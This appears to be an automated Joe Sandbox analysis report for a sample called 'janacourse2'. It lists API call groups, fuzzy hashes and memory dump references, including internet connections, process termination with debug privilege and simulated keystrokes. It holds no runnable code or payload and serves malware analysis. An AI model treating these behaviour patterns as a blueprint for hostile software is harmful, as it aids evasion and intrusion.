                                                                                                            • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                            • String ID:
                                                                                                            • API String ID: 1282221369-0
                                                                                                            • Opcode ID: 25a0ebe6e278a9aaac0911378e6fbd98e0a7d59347e170ba4b19bb2693ed01ce
                                                                                                            • Instruction ID: fcbff18871cdf071d1e6cde6d1df71ba479c73c54c2dcd36b3343c1e9bc74cf9
                                                                                                            • Opcode Fuzzy Hash: 25a0ebe6e278a9aaac0911378e6fbd98e0a7d59347e170ba4b19bb2693ed01ce
                                                                                                            • Instruction Fuzzy Hash: CD613B72D043C46FDB21AF769C41A6D7BA5AF05320F04416EF98197246E73A9D02B7A1
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 01045186
                                                                                                            • ShowWindow.USER32(?,00000000), ref: 010451C7
                                                                                                            • ShowWindow.USER32(?,00000005,?,00000000), ref: 010451CD
                                                                                                            • SetFocus.USER32(?,?,00000005,?,00000000), ref: 010451D1
                                                                                                              • Part of subcall function 01046FBA: DeleteObject.GDI32(00000000), ref: 01046FE6
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0104520D
                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0104521A
                                                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0104524D
                                                                                                            • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 01045287
                                                                                                            • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 01045296
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                            • String ID:
                                                                                                            • API String ID: 3210457359-0
                                                                                                            • Opcode ID: aa06062ed3d3470cb30185c1c93e956d62179caef898f43797832abba3887389
                                                                                                            • Instruction ID: d21710cf8813dec88a680676ac0ac6a0b35a72157ebd40dc425dbf9de134eb8f
                                                                                                            • Opcode Fuzzy Hash: aa06062ed3d3470cb30185c1c93e956d62179caef898f43797832abba3887389
                                                                                                            • Instruction Fuzzy Hash: CF51B5B0A41209BFFF309E28CDCABD93BA5FF45321F148062F695962E1D775A580DB41
                                                                                                            APIs
                                                                                                            • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 01006890
                                                                                                            • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 010068A9
                                                                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 010068B9
                                                                                                            • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 010068D1
                                                                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 010068F2
                                                                                                            • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00FC8874,00000000,00000000,00000000,000000FF,00000000), ref: 01006901
                                                                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0100691E
                                                                                                            • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00FC8874,00000000,00000000,00000000,000000FF,00000000), ref: 0100692D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 1268354404-0
                                                                                                            • Opcode ID: bd9ad2f3a676178766c0546e142e364066a1f0e181d4b939a533af1feb8ca0f4
                                                                                                            • Instruction ID: 8f7237f42310ca5ce58abd9a817eeee3cde6754f8147af49ae39fa26c6de8404
                                                                                                            • Opcode Fuzzy Hash: bd9ad2f3a676178766c0546e142e364066a1f0e181d4b939a533af1feb8ca0f4
                                                                                                            • Instruction Fuzzy Hash: 4F516DB0600206EFEB21CF24C986FAA7BB6FF84750F104518F986972D0DB76E951DB50
                                                                                                            APIs
                                                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0102C182
                                                                                                            • GetLastError.KERNEL32 ref: 0102C195
                                                                                                            • SetEvent.KERNEL32(?), ref: 0102C1A9
                                                                                                              • Part of subcall function 0102C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0102C272
                                                                                                              • Part of subcall function 0102C253: GetLastError.KERNEL32 ref: 0102C322
                                                                                                              • Part of subcall function 0102C253: SetEvent.KERNEL32(?), ref: 0102C336
                                                                                                              • Part of subcall function 0102C253: InternetCloseHandle.WININET(00000000), ref: 0102C341
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                            • String ID:
                                                                                                            • API String ID: 337547030-0
                                                                                                            • Opcode ID: 232aedf45038018b8424d9fe5d94a60415572e710437672e3050c1fa87938896
                                                                                                            • Instruction ID: 640084dff43e9a1509816410361e1e9bb4bbc807213df7be13b10917ecf36c07
                                                                                                            • Opcode Fuzzy Hash: 232aedf45038018b8424d9fe5d94a60415572e710437672e3050c1fa87938896
                                                                                                            • Instruction Fuzzy Hash: AB31A0B5101651AFFB319FA9DB44A6EBBF8FF19200B00441DF99A83604DB36E414DBA0
                                                                                                            APIs
                                                                                                              • Part of subcall function 01013A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 01013A57
                                                                                                              • Part of subcall function 01013A3D: GetCurrentThreadId.KERNEL32 ref: 01013A5E
                                                                                                              • Part of subcall function 01013A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,010125B3), ref: 01013A65
                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 010125BD
                                                                                                            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 010125DB
                                                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 010125DF
                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 010125E9
                                                                                                            • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 01012601
                                                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 01012605
                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 0101260F
                                                                                                            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 01012623
                                                                                                            • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 01012627
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2014098862-0
                                                                                                            • Opcode ID: accd2ec66694d5056f725708e02febd7befb873eae7f604a63714d180d40a7cb
                                                                                                            • Instruction ID: dc9f13e224ddc11458fa0f06c0b6388d65d3c85390d919aecb7b065fa3491c46
                                                                                                            • Opcode Fuzzy Hash: accd2ec66694d5056f725708e02febd7befb873eae7f604a63714d180d40a7cb
                                                                                                            • Instruction Fuzzy Hash: A301D871791210BBFB2066689DCAF593F59EB4EB11F500001F398AE0D8C9F624448BA9
                                                                                                            APIs
                                                                                                            • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,01011449,?,?,00000000), ref: 0101180C
                                                                                                            • HeapAlloc.KERNEL32(00000000,?,01011449,?,?,00000000), ref: 01011813
                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,01011449,?,?,00000000), ref: 01011828
                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,01011449,?,?,00000000), ref: 01011830
                                                                                                            • DuplicateHandle.KERNEL32(00000000,?,01011449,?,?,00000000), ref: 01011833
                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,01011449,?,?,00000000), ref: 01011843
                                                                                                            • GetCurrentProcess.KERNEL32(01011449,00000000,?,01011449,?,?,00000000), ref: 0101184B
                                                                                                            • DuplicateHandle.KERNEL32(00000000,?,01011449,?,?,00000000), ref: 0101184E
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,01011874,00000000,00000000,00000000), ref: 01011868
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 1957940570-0
                                                                                                            • Opcode ID: 72a351420129b8021671a6c52212de14f23487cf284d129d59264ab2377bb0e2
                                                                                                            • Instruction ID: ced7f5abe87cf8049183c6992050c25ae0887f4cc5b7670900e200c84eb09805
                                                                                                            • Opcode Fuzzy Hash: 72a351420129b8021671a6c52212de14f23487cf284d129d59264ab2377bb0e2
                                                                                                            • Instruction Fuzzy Hash: 6601BFB5241304BFF720ABB5DE8DF573B6CEB89B11F004411FA45DB195C6759800CB20
                                                                                                            APIs
                                                                                                              • Part of subcall function 0101D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0101D501
                                                                                                              • Part of subcall function 0101D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0101D50F
                                                                                                              • Part of subcall function 0101D4DC: CloseHandle.KERNEL32(00000000), ref: 0101D5DC
                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0103A16D
                                                                                                            • GetLastError.KERNEL32 ref: 0103A180
                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0103A1B3
                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 0103A268
                                                                                                            • GetLastError.KERNEL32(00000000), ref: 0103A273
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0103A2C4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                            • String ID: SeDebugPrivilege
                                                                                                            • API String ID: 2533919879-2896544425
                                                                                                            • Opcode ID: 58bf0a142bb3184e53ab1b3b7c6752b42eb0631f90ef3f215efef377c7d28de7
                                                                                                            • Instruction ID: 7efbd9fdcc761551708f6b1fb2cf14a92f82e6ceadb5430050687fcee52e1a6c
                                                                                                            • Instruction Fuzzy Hash: 4761B374204242DFE720DF19C494F6ABBE5AF84318F18848CE5E68B7A3C776E945CB91
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 01043925
                                                                                                            • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0104393A
                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 01043954
                                                                                                            • _wcslen.LIBCMT ref: 01043999
                                                                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 010439C6
                                                                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 010439F4
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window_wcslen
                                                                                                            • String ID: SysListView32
                                                                                                            • API String ID: 2147712094-78025650
                                                                                                            • Opcode ID: 9a5e152c003ed892af0bcfd5e53ccace4329f1f3e68e02d86003adab1eb94f09
                                                                                                            • Instruction ID: 4c3704be7119cf9d01c791312b8dcd4247625003295a869204a19c8873c31b7e
                                                                                                            • Instruction Fuzzy Hash: DE4197B1A00319ABEF219F64CC85BEE7BA9FF08350F10156AF994EB281D7759950CB90
                                                                                                            APIs
                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0101BCFD
                                                                                                            • IsMenu.USER32(00000000), ref: 0101BD1D
                                                                                                            • CreatePopupMenu.USER32 ref: 0101BD53
                                                                                                            • GetMenuItemCount.USER32(01185A40), ref: 0101BDA4
                                                                                                            • InsertMenuItemW.USER32(01185A40,?,00000001,00000030), ref: 0101BDCC
                                                                                                            Similarity
                                                                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                            • String ID: 0$2
                                                                                                            • API String ID: 93392585-3793063076
                                                                                                            • Opcode ID: 2f7bef85db78c9f44a797cfb0df7d3f38a429c97d19c8e7856b8a3a72adc8b78
                                                                                                            • Instruction ID: 7ffcce6f62ca112f8f4478ece3632145fe7639d5b7b8e87d4b77f64d61ced8be
                                                                                                            • Instruction Fuzzy Hash: BD5121706002059BEF28EFACC9C4BAEBFF4BF45314F544199E581DB288E7789941CB52
                                                                                                            APIs
                                                                                                            • LoadIconW.USER32(00000000,00007F03), ref: 0101C913
                                                                                                            Similarity
                                                                                                            • API ID: IconLoad
                                                                                                            • String ID: blank$info$question$stop$warning
                                                                                                            • API String ID: 2457776203-404129466
                                                                                                            • Opcode ID: a673924f3ced525eb902be03f14d9d13dc3facfe3b9c71889165906184ef5db5
                                                                                                            • Instruction ID: d4a6c20b188f77d73c09d7fc629b4f3c1c792c19f9c79596279fddf0aee7c38e
                                                                                                            • Instruction Fuzzy Hash: CB110B316C9707BBB7015A589EC3C9E77DDEF05360B10006FF580AA286E77DE9005268
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen$LocalTime
                                                                                                            • String ID:
                                                                                                            • API String ID: 952045576-0
                                                                                                            • Opcode ID: 7124936fba6156f1ffec1790a00116bcea5e754886dc97b52a8478161e7057d0
                                                                                                            • Instruction ID: b2c3b9482756ec7381cbd1213057c9cff8c5c0a63e0c9a90d23de417065f6896
                                                                                                            • Instruction Fuzzy Hash: 7E418365C1011876CB11EBB4CC8A9CFB7A9AF45710F548467FA14E3222FB38E255C7E6
                                                                                                            APIs
                                                                                                            • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0100682C,00000004,00000000,00000000), ref: 00FCF953
                                                                                                            • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0100682C,00000004,00000000,00000000), ref: 0100F3D1
                                                                                                            • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0100682C,00000004,00000000,00000000), ref: 0100F454
                                                                                                            Similarity
                                                                                                            • API ID: ShowWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 1268545403-0
                                                                                                            • Opcode ID: c215e7a7c8265a730b5b29c30d29219e59a735144fd6cc9231184fe490b46c49
                                                                                                            • Instruction ID: fedf05df4ca5fb9bf36e11a06356e46dbf387706d8f88263680bf3f5991a1acc
                                                                                                            • Instruction Fuzzy Hash: 30412E31918642BBEF798B2C8F89F69FF936B46320F04842DE5C756990C637A488E711
                                                                                                            APIs
                                                                                                            • DeleteObject.GDI32(00000000), ref: 01042D1B
                                                                                                            • GetDC.USER32(00000000), ref: 01042D23
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 01042D2E
                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 01042D3A
                                                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 01042D76
                                                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 01042D87
                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,01045A65,?,?,000000FF,00000000,?,000000FF,?), ref: 01042DC2
                                                                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 01042DE1
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 3864802216-0
                                                                                                            • Opcode ID: 11856e55cd5794d1c4d9a6cbcd148220496f58d50b257cd097ab4ca94383dc52
                                                                                                            • Instruction ID: b5e4bcc115bf929516129021f056c3b710f019ffa7ccbaeb7275de1b9358c96d
                                                                                                            • Instruction Fuzzy Hash: 0B31A2B62026147FFB214F54DD89FEB3FADEF09711F044065FE889A191C6759840C7A0
                                                                                                            Similarity
                                                                                                            • API ID: _memcmp
                                                                                                            • String ID:
                                                                                                            • API String ID: 2931989736-0
                                                                                                            • Opcode ID: b6cb62ee0745b40035f88b2060a8d4b56a6adc6619584d1c6c5bad3576f9edf0
                                                                                                            • Instruction ID: 7e35713f8b23e8d8f33cf938b2dc210dd3a0cedd4f43bb26f09d7cac159206ad
                                                                                                            • Instruction Fuzzy Hash: E921C9A174020ABBE21465296EC2FFE339DBF97284F080425FD849F646F76CED1085E5
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                                                                            • API String ID: 0-572801152
                                                                                                            • Opcode ID: d56c7b182cc52010b6f1e0e98048a8a651736135fc937d585f541672330a16a0
                                                                                                            • Instruction ID: 092b4769224ef4be8dccec49b0e2acec2e3a9016cf203a267795e5f110aa7129
                                                                                                            • Opcode Fuzzy Hash: d56c7b182cc52010b6f1e0e98048a8a651736135fc937d585f541672330a16a0
                                                                                                            • Instruction Fuzzy Hash: D3D18375A0020A9FDF10CF98CC84BAEB7F9BF88314F148469F995AB291E771D945CB90
                                                                                                            APIs
                                                                                                            • GetCPInfo.KERNEL32(?,?), ref: 00FF15CE
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00FF1651
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00FF16E4
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00FF16FB
                                                                                                              • Part of subcall function 00FE3820: RtlAllocateHeap.NTDLL(00000000,?,01081444,?,00FCFDF5,?,?,00FBA976,00000010,01081440,00FB13FC,?,00FB13C6,?,00FB1129), ref: 00FE3852
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00FF1777
                                                                                                            • __freea.LIBCMT ref: 00FF17A2
                                                                                                            • __freea.LIBCMT ref: 00FF17AE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                            • String ID:
                                                                                                            • API String ID: 2829977744-0
                                                                                                            • Opcode ID: a1f016196e4515349f120fdc18f92b2ddded09100835251eeac01770553e4286
                                                                                                            • Instruction ID: 7c0f7986c114d0d166cd3bb4d208194c55ca1c80e7e0ff6e021d7e32f54be750
                                                                                                            • Opcode Fuzzy Hash: a1f016196e4515349f120fdc18f92b2ddded09100835251eeac01770553e4286
                                                                                                            • Instruction Fuzzy Hash: 6F91B172E0021EDADB209E75CD81AFE7BB5BF49320F1C0659EA05E7160DB25DD44EBA0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Variant$ClearInit
                                                                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                            • API String ID: 2610073882-625585964
                                                                                                            • Opcode ID: 60baadb88a37d2374b24c81d795597afdb991d6dd6b12a60deec5789f17bbdf8
                                                                                                            • Instruction ID: 5a238775f61989ea5ccb6a98784eda8e48c0122c0aec045c85f26808fe50a202
                                                                                                            • Opcode Fuzzy Hash: 60baadb88a37d2374b24c81d795597afdb991d6dd6b12a60deec5789f17bbdf8
                                                                                                            • Instruction Fuzzy Hash: 52916B71A00219ABDF25CFA9C888FAEBBB8FF85710F108559F545EF281D7709945CBA0
                                                                                                            APIs
                                                                                                            • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0102125C
                                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 01021284
                                                                                                            • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 010212A8
                                                                                                            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 010212D8
                                                                                                            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0102135F
                                                                                                            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 010213C4
                                                                                                            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 01021430
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                            • String ID:
                                                                                                            • API String ID: 2550207440-0
                                                                                                            • Opcode ID: c24517c8da48a74713963c35173994196b302552e1fc4a4a0e78c8ecd65b5fa1
                                                                                                            • Instruction ID: e8d5e5bd11d7040642a18cf0201162fff677dc2870bcf695898292b8a687705e
                                                                                                            • Opcode Fuzzy Hash: c24517c8da48a74713963c35173994196b302552e1fc4a4a0e78c8ecd65b5fa1
                                                                                                            • Instruction Fuzzy Hash: 7C9107B5900229AFEB10DF98C884BFEB7B5FF45314F104069FA80E7291DB79A945CB90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ObjectSelect$BeginCreatePath
                                                                                                            • String ID:
